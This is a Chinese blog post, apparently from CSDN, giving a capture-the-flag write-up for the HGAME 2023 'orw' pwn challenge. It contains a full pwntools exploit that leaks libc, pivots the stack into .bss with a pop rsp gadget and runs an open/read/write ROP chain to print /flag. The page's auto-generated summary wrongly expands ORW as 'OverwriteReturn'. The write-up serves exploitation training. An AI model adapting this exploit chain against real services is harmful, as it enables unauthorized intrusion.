【PWN · ORW | 栈迁移 | ROP】[HGAME 2023 week1]orw

最新推荐文章于 2024-02-02 18:53:02 发布
最新推荐文章于 2024-02-02 18:53:02 发布
阅读量801 收藏 9
点赞数 8
分类专栏: 【PWN · 高级栈相关】 文章标签: ORW ctf pwn 栈迁移 栈溢出 ROP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/135709318
版权
本文讲述了在具有沙箱限制的栈溢出环境中,如何通过泄露并利用libc库的gadgets实现ORW(OverwriteReturn)技术,包括泄露libc地址、构造ROP链以及将栈迁移至BSS段的过程,最终实现程序控制并交互式获取flag。
摘要由CSDN通过智能技术生成

这题有些许复杂,但也并没有

前言

ROP的ORW还是第一次做,之前接触到的都是shellcode形式的

利用libc的gadget是个很好的思路,能获得大量有益的gadget

一、题目

 栈溢出但是沙箱,需要orw

 但是溢出长度仅有0x30——需要栈迁移

二、思路

  1. 泄露libc,经典地puts(puts)即可,并且返回到vuln重新触发漏洞
  2. 第二次栈溢出,构造read,利用其将ROP链写到bss段
  3. 写ROP链——open、read、write
  4. 将栈迁移到bss对应位置,这里没有用leave,而是用libc的丰富gadget——pop rsp

三、EXP

from pwn import *
from pwn import p64,u64
context(arch='amd64',log_level='debug')

# libc-gadgets
# 0x0000000000023b6a : pop rdi ; ret
# 0x000000000002601f : pop rsi ; ret
# 0x0000000000142c92 : pop rdx ; ret
# 0x000000000002f70a : pop rsp ; ret
# elf-gadgets
# 0x0000000000401393 : pop rdi ; ret

vuln=0x04012C0
rdi=0x401393
# io=process('./pwn')
io=remote('node5.anna.nssctf.cn',28012)
elf=ELF('./pwn')
libc=ELF('./libc-2.31.so')
# gdb.attach(io)
# input()

### leak_libc
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
payload=b'a'*0x108+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln)
io.sendlineafter(b'task.\n',payload)
puts_real=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
success('puts_real:'+hex(puts_real))
libc_base=puts_real-libc.sym['puts']
success('libc_base:'+hex(libc_base))

### read_bss
bss_base=elf.bss()
# read(int fd, void *buf, size_t count);
read_real=libc_base+libc.sym['read']
fd=0
buf=bss_base+0x100
count=0x200
rdi=libc_base+0x23b6a
rsi=libc_base+0x2601f
rdx=libc_base+0x142c92
rsp=libc_base+0x2f70a
# payload=b'a'*0x108+p64(rdi)+p64(fd)+p64(rsi)+p64(buf)+p64(rdx)+p64(count)+p64(read_real)+p64(rsp)+p64(buf+8) 
# 利用到这个阶段时,寄存器残留值,可以减少payload的长度,刚好在这里用满了溢出的0x30字节
# p64(rsp)+p64(buf+8),修改rsp的值,+8是因为头部放了flag\x00
payload=b'a'*0x108+p64(rsi)+p64(buf)+p64(read_real)+p64(rsp)+p64(buf+8)
io.send(payload)

### rop->bss
payload=b'/flag'.ljust(8,b'\x00')
# open(const char *pathname, int flags)
open_real=libc_base+libc.sym['open']
pathname_ptr=buf
flags=0
payload+=p64(rdi)+p64(pathname_ptr)+p64(rsi)+p64(flags)+p64(open_real)
# read(int fd, void *buf, size_t count);
fd=3
buf2=buf+0x300
count=0x100
payload+=p64(rdi)+p64(fd)+p64(rsi)+p64(buf2)+p64(rdx)+p64(count)+p64(read_real)
# write(int handle,void* buf,int length)
write_real=libc_base+libc.sym['write']
handle=1
buf3=buf2
length=0x50
payload+=p64(rdi)+p64(handle)+p64(rsi)+p64(buf3)+p64(rdx)+p64(length)+p64(write_real)+p64(vuln)
# payload+=p64(rsi)+p64(buf3)+p64(rdx)+p64(length)+p64(write_real)+p64(vuln)
io.send(payload)

sleep(1)
io.recv()
io.interactive()
Mr_Fmnwon
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn --迁移
zszcr的博客
04-07 6993
迁移主要是为了解决栈溢出可以溢出空间大小不足的问题迁移的实现:通过将ebp覆盖成我们构造的fake_ebp ,然后利用leave_ret这个gadget将esp劫持到fake_ebp的地址上leave_ret相当于:mov %ebp,%esp pop %ebp pop %eip接下来拿HITCON-Training-master 的 lab6做例子题目链接:https://github.com...
PWN题[强网先锋]orw超详细讲解(多解法)
am_03的博客
09-01 4324
知识点 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖正常的返回地址。 \x00 截断符 shellcode里出现\x00就会从其截断,所以构造shellcode的时候要避免\x00 x64函数调用规则 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到里,保存
迁移(Stack Pivoting)进阶
hackzkaq的博客
11-17 292
迁移(Stack Pivoting)是一种在漏洞利用中常见的技术,用于改变的正常行为,特别是在缓冲区溢出等安全漏洞的情况下。迁移的核心在于修改指针(如 x86 架构中 ESP 寄存器)的值,使其指向攻击者控制的数据区域。在实际应用中,我们常通过劫持ebp和esp将劫持到bss段。在迁移十分关键的就是对leave,ret;这段gadget的利用pop ebp;ret == pop eip #弹出顶数据给eip寄存器。
Hgame-2023(前三周pwn题解)
weixin_73290593的博客
02-01 1179
hgame,真好玩
从零开始做题:逆向 ret2shellcode orw
weixin_44626085的博客
01-28 779
下载orw时防病毒要关闭。
pop指令的功能是什么?如何借助其他指令实现其功能_给Rust实现一个简单的stackful generator(中)上下文切换...
weixin_39760068的博客
12-06 565
本来我想一口气发完的,但感觉这次的文章写得实在太差,逻辑感不强,也比较长,所以本文尝试分为三部分:原型与api https://zhuanlan.zhihu.com/p/91179318上下文切换 https://zhuanlan.zhihu.com/p/91184528完善功能 https://zhuanlan.zhihu.com/p/91186796这部分主要讲上下文切换的实现。ucontex...
PWN入门之迁移-附件资源
03-02
PWN入门之迁移-附件资源
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
栈溢出基础——ROP1.0的例题
07-13
栈溢出基础——ROP1.0的例题 在网络安全领域,栈溢出是一种常见的漏洞类型,它源于程序处理内存时的错误,可能导致攻击者控制程序执行流程,从而执行恶意代码。本篇将深入探讨栈溢出的基础知识,并通过一个名为...
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
迁移
weixin_44932880的博客
10-13 607
leave ret 原理 一次leave 将 rsp指向 原rbp+8 , rbp指向原rbp 的内容, move rsp rbp (rbp的地址赋值给rsp的地址,即rsp指向rbp) pop rbp (rbp指向rsp的内容(rbp的内容),rsp+=8) 一次ret rip指向原rsp的内容,rsp+=8 pop rip 一次leave ret 使rbp指向原rbp的内容,rsp指向 原rbp+16,rip指向原rbp+8 两次leave ret
沙盒绕过:orw的两种利用方式
最新发布
2302_79813730的博客
02-02 1684
接下来借一道例题来讲一下orw(open,read,write)的两种利用方式,open(打开)flag文件,将他read(读入)该有的位置,并(write)写出来,一般选取的都是bss段,但这里一般没有那么大的权限,就需要mprotect去该权限(前边已经讲过了,这个也是沙箱的基础),再利用orw。2直接进行计算,通过脚本可以知道,我们payload链读入到bss+0x28的位置,p64()打包为八个字节,中间有个*2要注意,再算上返回地址本身,一共是0x48,也就计算出来了。
[Assembly] 程序的机器级表示(三):指令、算术和逻辑指令
Pangda code twice
06-02 4935
指令 指令 效果 描述 pushq S R[%rsp]←R[%rsp] - 8
几种基本汇编指令详解
远航 | FIBOS.io
07-07 4万+
几种基本汇编指令详解常见寄存器 寄存器 16位 32位 64位 累加寄存器 AX EAX RAX 基址寄存器 BX EBX RBX 计数寄存器 CX ECX RCX 数据寄存器 DX EDX RDX 堆基指针 BP EBP RBP 变址寄存器 SI ESI RSI 堆顶指针 SP
Push, Pop, call, leave 和 Ret 指令图解
热门推荐
striver1205的专栏
05-14 6万+
结构图:最近在研究如何在程序crash定位出错函数,补充的计算机系统基础知识。此篇主要是介绍IA32中帧结构(frame stack).
X64 汇编入门
lqw198421的专栏
03-31 2331
目录 前言 64位和32位汇编的差异 示例说明 前言 公司项目需要实现通过汇编来获取调用的功能,自己写了一个,直接崩溃,回头学习一下,以此为记; 64位和32位汇编的差异 这方面我现在涉及的不多,就不展开了,大家可以自己去查一下资料,或者直接参考一下下面的链接: https://blog.csdn.net/qq_29343201/article/details/512787...
pwn调整帧的技巧
sea_time的博客
12-05 1108
调整帧的技巧 我们在存在栈溢出程序中,经常会碰到一些关于的问题,比如开启ASLR导致地址不可预测,所能溢出的字节数太少等等。对于这些问题,我们有时候可以通过gadgets来调整帧以完成攻击。比如我们所用到的常见手段,包括esp值的加减,利用部分溢出字节来修改ebp的值来进行stack pivoting等。 0x00 扩大空间 正常来说,当空间不够用时我们是写入bss段中的,那有什么办...
汇编指令push,mov,call,pop,leave,ret建立与释放的过程
liu_if_else的博客
05-28 2万+
感觉这东西有点烧脑,花了一下午时间终于整个捋顺了整个流程。 想理解好此过程,理解每个指令的作用,必须结合指令行地址,地址和寄存器一起来分析,否则很容易被绕晕。 大图图片说明:内存地址,汇编指令都为简写,用的十进制,空间1个格子大小是4*8=32位(对应32位操作系统),指令行长度应为1-6字节,都简化为1字节。为了简化汇编指令行,函数都没有参数。实际执行顺序一列中,左边为寄存器或空间地址,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值